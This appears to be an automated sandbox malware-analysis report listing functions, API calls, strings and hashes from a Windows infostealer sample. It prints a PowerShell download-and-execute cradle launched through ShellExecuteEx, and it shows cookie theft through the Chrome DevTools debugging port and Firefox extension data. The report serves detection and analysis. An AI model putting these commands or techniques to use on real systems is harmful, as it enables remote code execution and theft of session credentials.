                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031AD91
                                  • lstrlen.KERNEL32(0102DDD8), ref: 0031ADA7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031ADCF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0031ADDA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031AE03
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031AE3F
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0031AE49
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031AE6F
                                  • lstrlen.KERNEL32(00000000), ref: 0031AE85
                                  • lstrcpy.KERNEL32(00000000,0102DE80), ref: 0031AEB8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen
                                  • String ID: f
                                  • API String ID: 2762123234-1993550816
                                  • Opcode ID: 2f54264918e2ebe04ed4c01eaa2cb7d5d4e6bc2f4d14b0de1830a489985bb097
                                  • Instruction ID: 9630ad1ab3b0f52d901bd88bdec74a411214e96cb36ddb9d782fca092f0ac6f6
                                  • Opcode Fuzzy Hash: 2f54264918e2ebe04ed4c01eaa2cb7d5d4e6bc2f4d14b0de1830a489985bb097
                                  • Instruction Fuzzy Hash: B5B17E70A12A169BCB27EBA8DC5CAAFB3B5AF04302F050424F805DB291DF74DD59DB91
                                  Function 003247E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(ws2_32.dll,?,003172A4), ref: 003247E6
                                  • GetProcAddress.KERNEL32(00000000,connect), ref: 003247FC
                                  • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0032480D
                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0032481E
                                  • GetProcAddress.KERNEL32(00000000,htons), ref: 0032482F
                                  • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00324840
                                  • GetProcAddress.KERNEL32(00000000,recv), ref: 00324851
                                  • GetProcAddress.KERNEL32(00000000,socket), ref: 00324862
                                  • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00324873
                                  • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00324884
                                  • GetProcAddress.KERNEL32(00000000,send), ref: 00324895
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                  • API String ID: 2238633743-3087812094
                                  • Opcode ID: 24941ef4c19b61159d2b96b0e811adf6122e6dbfe38007d3233489c89ac0f7c9
                                  • Instruction ID: 251d20b777fa496728f6e55989f5baedef7d8f045d272dd95cbd2117af921221
                                  • Opcode Fuzzy Hash: 24941ef4c19b61159d2b96b0e811adf6122e6dbfe38007d3233489c89ac0f7c9
                                  • Instruction Fuzzy Hash: 8311DEB5D52720AFCB19DFB5AD4DAA63ABCBA29706704081AF151D2360DBF4400CFF50
                                  Function 0031BE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031BE53
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031BE86
                                  • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0031BE91
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031BEB1
                                  • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0031BEBD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031BEE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0031BEEB
                                  • lstrlen.KERNEL32(')"), ref: 0031BEF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031BF13
                                  • lstrcat.KERNEL32(00000000,')"), ref: 0031BF1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031BF46
                                  • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0031BF66
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031BF88
                                  • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0031BF94
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031BFBA
                                  • ShellExecuteEx.SHELL32(?), ref: 0031C00C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 4016326548-898575020
                                  • Opcode ID: 14be1c294033f4bff0d71056b17b63728d088d6d82c414417f91d13e27624473
                                  • Instruction ID: 47cfb5cd68da93f870bbceb32f06a408907f57978dd9ff844375d1dd877a59a4
                                  • Opcode Fuzzy Hash: 14be1c294033f4bff0d71056b17b63728d088d6d82c414417f91d13e27624473
                                  • Instruction Fuzzy Hash: 7F61C871E112169BCB27AFB99C8D6EFBBB8AF18300F051425F405E7251DF34D9568B90
                                  Function 00321820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0032184F
                                  • lstrlen.KERNEL32(01016108), ref: 00321860
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321887
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00321892
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003218C1
                                  • lstrlen.KERNEL32(00334FA0), ref: 003218D3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003218F4
                                  • lstrcat.KERNEL32(00000000,00334FA0), ref: 00321900
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0032192F
                                  • lstrlen.KERNEL32(01016118), ref: 00321945
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0032196C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00321977
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003219A6
                                  • lstrlen.KERNEL32(00334FA0), ref: 003219B8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003219D9
                                  • lstrcat.KERNEL32(00000000,00334FA0), ref: 003219E5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321A14
                                  • lstrlen.KERNEL32(01016128), ref: 00321A2A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321A51
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00321A5C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321A8B
                                  • lstrlen.KERNEL32(01016148), ref: 00321AA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321AC8
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00321AD3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00321B02
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1049500425-0
                                  • Opcode ID: d3f32509c7a0e3f82969393272136142023d2f24a8ce4deea36f9c81cf3d373b
                                  • Instruction ID: 2cdd98327aa5346b846b58712429664a83448b631aa74ddb357fc87ce9ee6bf6
                                  • Opcode Fuzzy Hash: d3f32509c7a0e3f82969393272136142023d2f24a8ce4deea36f9c81cf3d373b
                                  • Instruction Fuzzy Hash: C49130B16017139FDB229FB9ED98A27B7E8AF24300F154828B886D7391DF74E845DB50
                                  Function 00314760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00314793
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 003147C5
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00314812
                                  • lstrlen.KERNEL32(00334B60), ref: 0031481D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031483A
                                  • lstrcat.KERNEL32(00000000,00334B60), ref: 00314846
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031486B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314898
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003148A3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003148CA
                                  • StrStrA.SHLWAPI(?,00000000), ref: 003148DC
                                  • lstrlen.KERNEL32(?), ref: 003148F0
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00314931
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003149B8
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003149E1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00314A0A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00314A30
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00314A5D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 4107348322-3310892237
                                  • Opcode ID: b0170524de267e662824edaa78f3db8a4f8cdbbb238f40b4bf7a3e520341e5d0
                                  • Instruction ID: c0795231da9ab771dac0e570fecbfbbf340b4712ba2eb6a34b08568a6da98542
                                  • Opcode Fuzzy Hash: b0170524de267e662824edaa78f3db8a4f8cdbbb238f40b4bf7a3e520341e5d0
                                  • Instruction Fuzzy Hash: E7B1B371A112069BCB27EF78D9999AF77B9AF54300F054428F845AB351DF30EC598B90
                                  Function 003092B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003090C0: InternetOpenA.WININET(0032CFEC,00000001,00000000,00000000,00000000), ref: 003090DF
                                    • Part of subcall function 003090C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 003090FC
                                    • Part of subcall function 003090C0: InternetCloseHandle.WININET(00000000), ref: 00309109
                                  • strlen.MSVCRT ref: 003092E1
                                  • strlen.MSVCRT ref: 003092FA
                                    • Part of subcall function 00308980: std::_Xinvalid_argument.LIBCPMT ref: 00308996
                                  • strlen.MSVCRT ref: 00309399
                                  • strlen.MSVCRT ref: 003093E6
                                  • lstrcat.KERNEL32(?,cookies), ref: 00309547
                                  • lstrcat.KERNEL32(?,00331794), ref: 00309559
                                  • lstrcat.KERNEL32(?,?), ref: 0030956A
                                  • lstrcat.KERNEL32(?,00334B98), ref: 0030957C
                                  • lstrcat.KERNEL32(?,?), ref: 0030958D
                                  • lstrcat.KERNEL32(?,.txt), ref: 0030959F
                                  • lstrlen.KERNEL32(?), ref: 003095B6
                                  • lstrlen.KERNEL32(?), ref: 003095DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00309614
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$strlen$Internet$Openlstrlen$CloseHandleXinvalid_argumentlstrcpystd::_
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 1201316467-3542011879
                                  • Opcode ID: 1e498a5d99efa4ae4e1b84e897ec1115347e81465c528e41f34166e9a33e171e
                                  • Instruction ID: 5f35c352fedbc79a686343c07df4a372396e5f9c6a49f751317c4bbb1426539e
                                  • Opcode Fuzzy Hash: 1e498a5d99efa4ae4e1b84e897ec1115347e81465c528e41f34166e9a33e171e
                                  • Instruction Fuzzy Hash: B9E12871E11218DFDF16DFA8D894ADEBBB5BF48300F1044AAE509A7281DB349E49CF90
                                  Function 0031D980 Relevance: 27.3, APIs: 18, Instructions: 292stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0031D9A1
                                  • memset.MSVCRT ref: 0031D9B3
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0031D9DB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031DA0E
                                  • lstrcat.KERNEL32(?,00000000), ref: 0031DA1C
                                  • lstrcat.KERNEL32(?,0102DF10), ref: 0031DA36
                                  • lstrcat.KERNEL32(?,?), ref: 0031DA4A
                                  • lstrcat.KERNEL32(?,0102CB10), ref: 0031DA5E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0031DA8E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0031DA95
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031DAFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 2367105040-0
                                  • Opcode ID: ebfb8a3a6d81b94518afb410a6d93dfb6d134370df242f2fafb2e061b9a5055f
                                  • Instruction ID: ffd622bdd1be786b37499abd290000746c83e5a4ccd30a554f79b193a3b82ecd
                                  • Opcode Fuzzy Hash: ebfb8a3a6d81b94518afb410a6d93dfb6d134370df242f2fafb2e061b9a5055f
                                  • Instruction Fuzzy Hash: 68B1B1B1D102599FCB16EFA4DC989EE77B9BF49300F044969F906E7250DB309E89CB90
                                  Function 0030B309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030B330
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B37E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B3A9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030B3B1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B3D9
                                  • lstrlen.KERNEL32(00334C50), ref: 0030B450
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B474
                                  • lstrcat.KERNEL32(00000000,00334C50), ref: 0030B480
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B4A9
                                  • lstrlen.KERNEL32(00000000), ref: 0030B52D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B557
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030B55F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B587
                                  • lstrlen.KERNEL32(00334AD4), ref: 0030B5FE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B622
                                  • lstrcat.KERNEL32(00000000,00334AD4), ref: 0030B62E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B65E
                                  • lstrlen.KERNEL32(?), ref: 0030B767
                                  • lstrlen.KERNEL32(?), ref: 0030B776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030B79E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
